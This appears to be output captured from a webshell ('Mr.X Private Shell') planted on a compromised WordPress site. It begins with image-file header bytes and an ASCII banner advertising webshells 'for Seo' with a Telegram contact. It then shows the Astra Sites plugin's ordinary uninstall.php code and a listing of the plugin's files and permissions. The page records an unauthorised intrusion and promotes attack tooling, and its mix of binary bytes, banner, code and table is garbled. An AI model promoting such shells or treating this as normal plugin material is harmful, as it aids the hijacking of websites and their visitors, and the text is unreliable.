����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Astra Sites Uninstall
*
* @package Astra Sites
*/
defined( 'WP_UNINSTALL_PLUGIN' ) || exit;
$site_pages = get_option( 'astra-sites-requests' );
if ( ! empty( $site_pages ) ) {
// Delete all sites.
for ( $site_page = 1; $site_page <= $site_pages; $site_page++ ) {
delete_site_option( 'astra-sites-and-pages-page-' . $site_page );
}
// Delete all pages count.
delete_site_option( 'astra-sites-requests' );
}
delete_option( 'astra_sites_recent_import_log_file' );
delete_option( 'astra_sites_import_data' );
delete_option( 'astra_sites_wpforms_ids_mapping' );
delete_option( '_astra_sites_old_customizer_data' );
delete_option( '_astra_sites_old_site_options' );
delete_option( '_astra_sites_old_widgets_data' );
delete_option( 'astra_sites_settings' );
delete_option( 'astra_parent_page_url' );
delete_option( 'astra-sites-favorites' );
delete_site_option( 'astra-sites-fresh-site' );
delete_site_option( 'astra-sites-batch-status' );
delete_site_option( 'astra-sites-batch-status-string' );
delete_site_option( 'astra-sites-all-site-categories' );
delete_site_option( 'astra-sites-all-site-categories-and-tags' );
delete_site_option( 'astra-sites-current-page' );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin | Folder | 0755 |
|
|
| classes | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| SECURITY.md | File | 427 B | 0644 |
|
| astra-pro-sites.php | File | 4.71 KB | 0644 |
|
| astra-sites.php | File | 3.26 KB | 0644 |
|
| changelog.txt | File | 63.53 KB | 0644 |
|
| class-brainstorm-update-astra-pro-sites.php | File | 10.44 KB | 0644 |
|
| readme.txt | File | 10.82 KB | 0644 |
|
| uninstall.php | File | 1.16 KB | 0644 |
|